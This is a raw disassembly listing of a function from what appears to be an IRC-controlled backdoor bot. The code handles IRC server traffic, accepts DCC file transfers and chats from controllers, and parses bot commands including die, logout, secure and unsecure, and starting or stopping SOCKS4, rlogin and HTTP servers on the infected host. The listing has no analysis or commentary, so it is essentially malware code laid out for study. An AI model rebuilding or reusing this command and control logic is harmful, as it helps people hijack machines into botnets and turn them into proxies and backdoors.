push eax
call sub_4191A0
lea eax, [ebp+var_FB0]
push offset asc_43ED84 ; " :"
push eax
call sub_419AB0
mov [ebp+var_C], eax
lea eax, [ebp+var_FB0]
push esi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_4191A0
lea eax, [ebp+var_11B0]
push offset asc_43ED88 ; " "
push eax
call sub_419890
add esp, 34h
mov [ebp+var_94], eax
lea esi, [ebp+var_90]
push 1Fh
pop edi
loc_40C5D5: ; CODE XREF: sub_40C50A+DE�j
push offset asc_43ED8C ; " "
push ebx
call sub_419890
mov [esi], eax
pop ecx
add esi, 4
dec edi
pop ecx
jnz short loc_40C5D5
mov esi, [ebp+var_94]
cmp esi, ebx
jz loc_40C97C
cmp [ebp+var_90], ebx
jz loc_40C97C
push 100h
lea eax, [ebp+var_A28]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
lea ecx, [ebp+var_18]
push 1Fh
pop edx
push 1
pop edi
loc_40C622: ; CODE XREF: sub_40C50A+14A�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_40C64E
cmp byte ptr [eax], 2Dh
jnz short loc_40C656
cmp [eax+2], bl
jnz short loc_40C656
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_A28], 1
mov esi, [ebp+var_94]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_40C64E: ; CODE XREF: sub_40C50A+11C�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_40C622
loc_40C656: ; CODE XREF: sub_40C50A+121�j
; sub_40C50A+126�j
cmp [ebp+var_9B5], bl
jz short loc_40C661
mov [ebp+var_8], edi
loc_40C661: ; CODE XREF: sub_40C50A+152�j
cmp [ebp+var_9BA], bl
jz short loc_40C66F
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_40C66F: ; CODE XREF: sub_40C50A+15D�j
cmp byte ptr [esi], 0Ah
jz short loc_40C6A9
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_4191A0
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_D4]
push eax
call sub_4191A0
lea eax, [ebp+var_D4]
push offset asc_43ED90 ; "!"
push eax
call sub_419890
add esp, 20h
loc_40C6A9: ; CODE XREF: sub_40C50A+168�j
push esi
push offset aPing ; "PING"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40C6FA
push [ebp+var_90]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_4083E7
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40C79E
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_4083E7
add esp, 10h
jmp loc_40C79E
; ---------------------------------------------------------------------------
loc_40C6FA: ; CODE XREF: sub_40C50A+1AE�j
mov esi, [ebp+var_90]
push esi
push offset a001 ; "001"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4127CE
push esi
push offset a005 ; "005"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4127CE
push esi
push offset a302 ; "302"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40C765
push offset a@ ; "@"
push [ebp+var_88]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40C79E
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_4191A0
add esp, 0Ch
jmp short loc_40C79E
; ---------------------------------------------------------------------------
loc_40C765: ; CODE XREF: sub_40C50A+22F�j
push esi
push offset a433 ; "433"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40C7A5
push ebx
push dword_43E1C4
push dword_43E1C0
push [ebp+arg_10]
call sub_4138AA
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_4083E7
add esp, 1Ch
loc_40C79E: ; CODE XREF: sub_40C50A+1CF�j
; sub_40C50A+1EB�j ...
mov eax, edi
jmp loc_40C97F
; ---------------------------------------------------------------------------
loc_40C7A5: ; CODE XREF: sub_40C50A+26A�j
mov esi, [ebp+arg_18]
mov [ebp+var_DC], 2
mov edi, 80h
loc_40C7B7: ; CODE XREF: sub_40C50A+2D2�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40C7D4
mov [ebp+var_B8], 1
loc_40C7D4: ; CODE XREF: sub_40C50A+2BE�j
add esi, edi
dec [ebp+var_DC]
jnz short loc_40C7B7
mov esi, [ebp+var_90]
push esi
push offset aKick ; "KICK"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40C8CB
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 2
loc_40C803: ; CODE XREF: sub_40C50A+386�j
cmp [esi], bl
jz loc_40C88B
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_4191A0
lea eax, [ebp+var_D4]
add esp, 0Ch
test eax, eax
jz short loc_40C88B
cmp [ebp+var_88], ebx
jz short loc_40C88B
push [ebp+var_88]
lea eax, [ebp+var_D4]
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40C88B
lea eax, [ebp+var_D4]
mov [esi], bl
push eax
lea eax, [ebp+var_2DC]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_418D70
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_D4]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_4083E7
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
add esp, 20h
loc_40C88B: ; CODE XREF: sub_40C50A+2FB�j
; sub_40C50A+31B�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_40C803
push [ebp+var_88]
push [ebp+arg_10]
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40C97C
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_40C8BE: ; CODE XREF: sub_40C50A+5FC�j
; sub_40C50A+8B2�j ...
push [ebp+arg_4]
call sub_4083E7
jmp loc_411F52
; ---------------------------------------------------------------------------
loc_40C8CB: ; CODE XREF: sub_40C50A+2E9�j
push esi
push offset aNick ; "NICK"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40CA16
mov eax, [ebp+var_8C]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 2
mov [ebp+arg_24], eax
loc_40C8F4: ; CODE XREF: sub_40C50A+43C�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40C941
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_4199F0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_40C941
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_419FA0
push [ebp+arg_1C]
push edi
call sub_419FB0
add esp, 10h
mov edi, 80h
loc_40C941: ; CODE XREF: sub_40C50A+3FB�j
; sub_40C50A+412�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_40C8F4
lea eax, [ebp+var_D4]
test eax, eax
jz short loc_40C97C
cmp [ebp+arg_24], ebx
jz short loc_40C97C
push [ebp+arg_10]
lea eax, [ebp+var_D4]
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40C984
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_4191A0
add esp, 0Ch
loc_40C97C: ; CODE XREF: sub_40C50A+5B�j
; sub_40C50A+E8�j ...
push 1
loc_40C97E: ; CODE XREF: sub_40C50A+5D09�j
pop eax
loc_40C97F: ; CODE XREF: sub_40C50A+296�j
; sub_40C50A+2289�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C984: ; CODE XREF: sub_40C50A+460�j
mov eax, [ebp+arg_18]
xor esi, esi
mov [ebp+arg_0], eax
loc_40C98C: ; CODE XREF: sub_40C50A+4A5�j
mov eax, [ebp+arg_0]
cmp [eax], bl
jz short loc_40C9A8
lea eax, [ebp+var_AA8]
push eax
push [ebp+arg_0]
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40C9B3
loc_40C9A8: ; CODE XREF: sub_40C50A+487�j
add [ebp+arg_0], edi
inc esi
cmp esi, 2
jl short loc_40C98C
jmp short loc_40C97C
; ---------------------------------------------------------------------------
loc_40C9B3: ; CODE XREF: sub_40C50A+49C�j
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_4199F0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz short loc_40C97C
push eax
call sub_418E70
push [ebp+arg_24]
mov edi, eax
call sub_418E70
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_40C97C
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_10 ; ":%s%s"
push esi
call sub_418D70
push ebx
lea eax, [ebp+var_4C0]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40842D
add esp, 24h
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_40CA16: ; CODE XREF: sub_40C50A+3D0�j
push esi
push offset aPart ; "PART"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40CA38
push esi
push offset aQuit_0 ; "QUIT"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40CA68
loc_40CA38: ; CODE XREF: sub_40C50A+51B�j
mov eax, [ebp+arg_18]
xor esi, esi
mov [ebp+arg_C], eax
loc_40CA40: ; CODE XREF: sub_40C50A+556�j
mov eax, [ebp+arg_C]
cmp [eax], bl
jz short loc_40CA59
push [ebp+var_94]
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40CAAA
loc_40CA59: ; CODE XREF: sub_40C50A+53B�j
add [ebp+arg_C], edi
inc esi
cmp esi, 2
jl short loc_40CA40
mov esi, [ebp+var_90]
loc_40CA68: ; CODE XREF: sub_40C50A+52C�j
push esi
push offset a353 ; "353"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40CB0B
push [ebp+var_84]
push [ebp+arg_8]
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40CA9A
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40CA9A: ; CODE XREF: sub_40C50A+585�j
push [ebp+var_84]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_4127C2
; ---------------------------------------------------------------------------
loc_40CAAA: ; CODE XREF: sub_40C50A+54D�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2DC]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_418D70
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
push [ebp+var_90]
push offset aPart_0 ; "PART"
call sub_419360
add esp, 18h
test eax, eax
jnz loc_40C97C
lea eax, [ebp+var_2DC]
push eax
mov eax, [ebp+var_94]
inc eax
push eax
push offset aNoticeSS_0 ; "NOTICE %s :%s\r\n"
jmp loc_40C8BE
; ---------------------------------------------------------------------------
loc_40CB0B: ; CODE XREF: sub_40C50A+56D�j
push esi
push offset aPrivmsg_0 ; "PRIVMSG"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40CB4E
push esi
push offset aNotice_0 ; "NOTICE"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40CB4E
push esi
push offset a332 ; "332"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_41263B
cmp dword_43E1AC, ebx
jz loc_41263B
loc_40CB4E: ; CODE XREF: sub_40C50A+610�j
; sub_40C50A+621�j
push esi
push offset aPrivmsg_1 ; "PRIVMSG"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40CCDE
push esi
push offset aNotice_1 ; "NOTICE"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40CCDE
mov eax, [ebp+var_88]
inc [ebp+var_84]
mov [ebp+var_BC], 4
mov [ebp+var_8C], eax
loc_40CB94: ; CODE XREF: sub_40C50A+890�j
; sub_40C50A+8C6�j ...
mov eax, [ebp+var_BC]
mov esi, eax
shl esi, 2
mov eax, [ebp+esi+var_94]
lea edi, [ebp+esi+var_94]
push eax
push offset dword_43EF3C
mov [ebp+arg_8], eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40CF7D
push [ebp+esi+var_90]
push offset aSend_0 ; "SEND"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40CE44
cmp [ebp+var_B8], ebx
jz loc_40CE1A
push [ebp+esi+var_8C]
lea eax, [ebp+var_6F4]
push offset aS_9 ; "%s"
push eax
call sub_418D70
push [ebp+esi+var_88]
lea eax, [ebp+var_708]
push offset aS_10 ; "%s"
push eax
call sub_418D70
push [ebp+esi+var_84]
call sub_4195F0
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D4]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_4191A0
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset aDccReceiveFile ; "[DCC]: Receive file: '%s' from user: %s"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_4161EB
add esp, 44h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_404A02
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz loc_40CDFD
loc_40CCC8: ; CODE XREF: sub_40C50A+7D2�j
cmp [ebp+var_560], ebx
jnz loc_40CE3C
push 32h
call ds:dword_4942D8
jmp short loc_40CCC8
; ---------------------------------------------------------------------------
loc_40CCDE: ; CODE XREF: sub_40C50A+653�j
; sub_40C50A+668�j
push esi
push offset aNotice_2 ; "NOTICE"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40CCF6
mov [ebp+var_4], 1
loc_40CCF6: ; CODE XREF: sub_40C50A+7E3�j
mov esi, [ebp+var_8C]
cmp esi, ebx
jz loc_40C97C
push offset asc_43EEF0 ; "#"
push esi
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jz short loc_40CD1A
cmp [ebp+var_4], ebx
jz short loc_40CD26
loc_40CD1A: ; CODE XREF: sub_40C50A+809�j
lea esi, [ebp+var_D4]
mov [ebp+var_8C], esi
loc_40CD26: ; CODE XREF: sub_40C50A+80E�j
cmp [ebp+var_88], ebx
jz loc_40C97C
inc [ebp+var_88]
jz short loc_40CD70
cmp [ebp+arg_10], ebx
jz short loc_40CD70
lea eax, [ebp+var_928]
push eax
call sub_418E70
push eax
lea eax, [ebp+var_928]
push [ebp+var_88]
push eax
call sub_41B790
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+var_BC], eax
jmp short loc_40CD76
; ---------------------------------------------------------------------------
loc_40CD70: ; CODE XREF: sub_40C50A+82E�j
; sub_40C50A+833�j
mov eax, [ebp+var_BC]
loc_40CD76: ; CODE XREF: sub_40C50A+864�j
shl eax, 2
mov [ebp+arg_8], eax
mov edi, [ebp+eax+var_94]
cmp edi, ebx
jz loc_40C97C
push edi
push offset dword_43EEF4
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40CB94
cmp byte ptr [esi], 23h
jz short loc_40CDC1
mov eax, dword_491D6C
mov eax, off_43E26C[eax*4]
cmp [eax], bl
jz short loc_40CDC1
push eax
push esi
push offset dword_43EF00
jmp loc_40C8BE
; ---------------------------------------------------------------------------
loc_40CDC1: ; CODE XREF: sub_40C50A+899�j
; sub_40C50A+8A9�j
push edi
push offset dword_43EF1C
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40CB94
mov eax, [ebp+arg_8]
mov eax, [ebp+eax+var_90]
cmp eax, ebx
jz loc_40CB94
cmp byte ptr [esi], 23h
jz loc_40CB94
push eax
push esi
push offset dword_43EF24
jmp loc_40C8BE
; ---------------------------------------------------------------------------
loc_40CDFD: ; CODE XREF: sub_40C50A+7B8�j
call ds:dword_4942F0
push eax
push offset aDccFailedToSta ; "[DCC]: Failed to start transfer thread,"...
loc_40CE09: ; CODE XREF: sub_40C50A+A4C�j
; sub_40C50A+A5D�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
jmp short loc_40CE3C
; ---------------------------------------------------------------------------
loc_40CE1A: ; CODE XREF: sub_40C50A+6DC�j
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2DC]
push [ebp+esi+var_8C]
push offset aDccReceiveFi_0 ; "[DCC]: Receive file: '%s' failed from u"...
push eax
call sub_418D70
add esp, 10h
loc_40CE3C: ; CODE XREF: sub_40C50A+7C4�j
; sub_40C50A+90E�j ...
push 1
pop esi
jmp loc_40E784
; ---------------------------------------------------------------------------
loc_40CE44: ; CODE XREF: sub_40C50A+6D0�j
push [ebp+esi+var_90]
push offset aChat ; "CHAT"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40CF93
cmp [ebp+var_B8], ebx
jz loc_40CF6C
push 13h
call sub_416433
test eax, eax
pop ecx
jnz loc_40CF5B
push [ebp+esi+var_88]
lea eax, [ebp+var_708]
push offset aS_11 ; "%s"
push eax
call sub_418D70
push [ebp+esi+var_84]
call sub_4195F0
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D4]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_4191A0
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2DC]
push offset aDccChatFromUse ; "[DCC]: Chat from user: %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 13h
push eax
call sub_4161EB
add esp, 34h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40449C
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40CF4A
loc_40CF34: ; CODE XREF: sub_40C50A+A3E�j
cmp [ebp+var_560], ebx
jnz loc_40CE3C
push 32h
call ds:dword_4942D8
jmp short loc_40CF34
; ---------------------------------------------------------------------------
loc_40CF4A: ; CODE XREF: sub_40C50A+A28�j
call ds:dword_4942F0
push eax
push offset aDccFailedToS_0 ; "[DCC]: Failed to start chat thread, err"...
jmp loc_40CE09
; ---------------------------------------------------------------------------
loc_40CF5B: ; CODE XREF: sub_40C50A+96B�j
lea eax, [ebp+var_D4]
push eax
push offset aDccChatAlready ; "[DCC]: Chat already active with user: %"...
jmp loc_40CE09
; ---------------------------------------------------------------------------
loc_40CF6C: ; CODE XREF: sub_40C50A+95B�j
lea eax, [ebp+var_D4]
push eax
push offset aDccChatFailedB ; "[DCC]: Chat failed by unauthorized user"...
jmp loc_40CE09
; ---------------------------------------------------------------------------
loc_40CF7D: ; CODE XREF: sub_40C50A+6B5�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_43E1B8
mov [edi], ecx
jnz loc_40C97C
loc_40CF93: ; CODE XREF: sub_40C50A+94F�j
mov edi, [edi]
push edi
push offset aHi ; "hi"
mov [ebp+arg_8], edi
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412643
push edi
push offset aFr ; "Fr"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412643
cmp [ebp+var_B8], ebx
jnz short loc_40CFE4
push [ebp+var_90]
push offset a332_3 ; "332"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_41263B
loc_40CFE4: ; CODE XREF: sub_40C50A+ABE�j
cmp [ebp+arg_28], ebx
jnz loc_41263B
xor edi, edi
cmp dword_43E5BC, ebx
jle loc_40D190
mov [ebp+arg_20], offset dword_44C2D8
loc_40D002: ; CODE XREF: sub_40C50A+B17�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40D028
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_43E5BC
jl short loc_40D002
jmp loc_40D190
; ---------------------------------------------------------------------------
loc_40D028: ; CODE XREF: sub_40C50A+B07�j
push offset asc_43F1F4 ; " :"
push [ebp+arg_0]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz loc_40C97C
mov cl, byte_43E1B8
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_43E1B8
mov [eax+3], cl
lea ecx, dword_44C2F0[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_4191A0
lea eax, [ebp+esi+var_54]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_40D07D: ; CODE XREF: sub_40C50A+C1B�j
push [ebp+arg_20]
lea eax, [ebp+var_B4]
push offset aD ; "$%d-"
push eax
call sub_418D70
lea eax, [ebp+var_B4]
push eax
push [ebp+arg_0]
call sub_419AB0
add esp, 14h
test eax, eax
jz short loc_40D0E9
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_40D0E9
lea eax, dword_44C2D8[edi]
push eax
call sub_418E70
add [ebp+var_C], eax
pop ecx
jz short loc_40D11B
mov eax, [ebp+arg_C]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40D11B
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+arg_0]
call sub_409842
add esp, 0Ch
jmp short loc_40D11B
; ---------------------------------------------------------------------------
loc_40D0E9: ; CODE XREF: sub_40C50A+B9B�j
; sub_40C50A+BA2�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_40D11B
lea eax, [ebp+var_B4]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_4191A0
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+arg_0]
call sub_409842
add esp, 18h
loc_40D11B: ; CODE XREF: sub_40C50A+BB4�j
; sub_40C50A+BC8�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_40D07D
lea eax, [ebp+esi+var_54]
mov [ebp+arg_20], 10h
mov edi, eax
loc_40D138: ; CODE XREF: sub_40C50A+C7A�j
push [ebp+arg_20]
lea eax, [ebp+var_B4]
push offset aD_0 ; "$%d"
push eax
call sub_418D70
lea eax, [ebp+var_B4]
push eax
push [ebp+arg_0]
call sub_419AB0
add esp, 14h
test eax, eax
jz short loc_40D17B
mov eax, [edi]
cmp eax, ebx
jz short loc_40D17B
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+arg_0]
call sub_409842
add esp, 0Ch
loc_40D17B: ; CODE XREF: sub_40C50A+C56�j
; sub_40C50A+C5C�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_40D138
mov [ebp+var_D8], 1
loc_40D190: ; CODE XREF: sub_40C50A+AEB�j
; sub_40C50A+B19�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, byte_43E1B8
jz short loc_40D1A9
cmp [ebp+var_D8], ebx
jz loc_40D392
loc_40D1A9: ; CODE XREF: sub_40C50A+C91�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_409842
lea eax, [ebp+var_D4]
push eax
push offset aUser_1 ; "$user"
push edi
call sub_409842
push [ebp+var_8C]
push offset aChan ; "$chan"
push edi
call sub_409842
push ebx
push ebx
lea eax, [ebp+var_B4]
push 2
push eax
call sub_4138AA
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_409842
add esp, 40h
push [ebp+arg_14]
push offset aServer ; "$server"
push edi
call sub_409842
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_419AB0
add esp, 14h
loc_40D21B: ; CODE XREF: sub_40C50A+E01�j
test eax, eax
jz loc_40D310
push offset aChr_0 ; "$chr("
push [ebp+arg_0]
call sub_419AB0
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B4]
push eax
call sub_4191A0
lea eax, [ebp+var_B4]
push offset asc_43F23C ; ")"
push eax
call sub_419890
add esp, 1Ch
cmp [ebp+var_B4], 30h
jl short loc_40D26B
cmp [ebp+var_B4], 39h
jle short loc_40D281
loc_40D26B: ; CODE XREF: sub_40C50A+D56�j
push 3
lea eax, [ebp+var_B4]
push offset a63 ; "63"
push eax
call sub_4191A0
add esp, 0Ch
loc_40D281: ; CODE XREF: sub_40C50A+D5F�j
lea eax, [ebp+var_B4]
push eax
call sub_4195F0
test eax, eax
pop ecx
jle short loc_40D2A4
lea eax, [ebp+var_B4]
push eax
call sub_4195F0
pop ecx
mov [ebp+var_14], al
jmp short loc_40D2B5
; ---------------------------------------------------------------------------
loc_40D2A4: ; CODE XREF: sub_40C50A+D86�j
call sub_419000
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_40D2B5: ; CODE XREF: sub_40C50A+D98�j
lea eax, [ebp+var_B4]
mov [ebp+var_13], bl
push eax
call sub_418E70
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_B4]
push ebx
push eax
call sub_4189A0
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_B4]
push [ebp+arg_10]
push eax
call sub_4191A0
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+arg_0]
call sub_409842
push edi
push [ebp+arg_0]
call sub_419AB0
add esp, 30h
jmp loc_40D21B
; ---------------------------------------------------------------------------
loc_40D310: ; CODE XREF: sub_40C50A+D13�j
mov edi, 1FFh
lea eax, [ebp+var_FB0]
push edi
push [ebp+arg_0]
push eax
call sub_4191A0
lea eax, [ebp+var_FB0]
push edi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_4191A0
lea eax, [ebp+var_11B0]
push offset asc_43F244 ; " "
push eax
call sub_419890
add esp, 20h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+arg_10], 1Fh
loc_40D360: ; CODE XREF: sub_40C50A+E6B�j
push offset asc_43F248 ; " "
push ebx
call sub_419890
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+arg_10]
pop ecx
jnz short loc_40D360
mov ecx, [ebp+esi+var_94]
lea eax, [ebp+esi+var_94]
cmp ecx, ebx
jz loc_40C97C
add ecx, 3
mov [eax], ecx
loc_40D392: ; CODE XREF: sub_40C50A+C99�j
mov edi, [ebp+esi+var_94]
push edi
push offset aRndnick_0 ; "rndnick"
mov [ebp+arg_8], edi
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4125EE
push edi
push offset aRn ; "rn"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4125EE
push edi
push offset aDie ; "die"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4125CC
push edi
push offset aD_1 ; "d"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4125CC
push edi
push offset aLogout ; "logout"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412502
push edi
push offset aLo ; "lo"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412502
push edi
push offset aVersion ; "version"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4124E4
push edi
push offset aVer ; "ver"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4124E4
push edi
push offset aSecure ; "secure"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4123D7
push edi
push offset aSec ; "sec"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4123D7
push edi
push offset aUnsecure ; "unsecure"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4123D7
push edi
push offset aUnsec ; "unsec"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4123D7
push edi
push offset aSocks4 ; "socks4"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4122B5
push edi
push offset aS4 ; "s4"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4122B5
push edi
push offset aSocks4stop ; "socks4stop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D4EB
push [ebp+esi+var_90]
push 11h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D4EB: ; CODE XREF: sub_40C50A+FC7�j
push edi
push offset aRloginstop ; "rloginstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D514
push [ebp+esi+var_90]
push 6
push offset aServer_1 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D514: ; CODE XREF: sub_40C50A+FF0�j
push edi
push offset aHttpstop ; "httpstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D53D
push [ebp+esi+var_90]
push 3
push offset aServer_2 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_412299
; ---------------------------------------------------------------------------
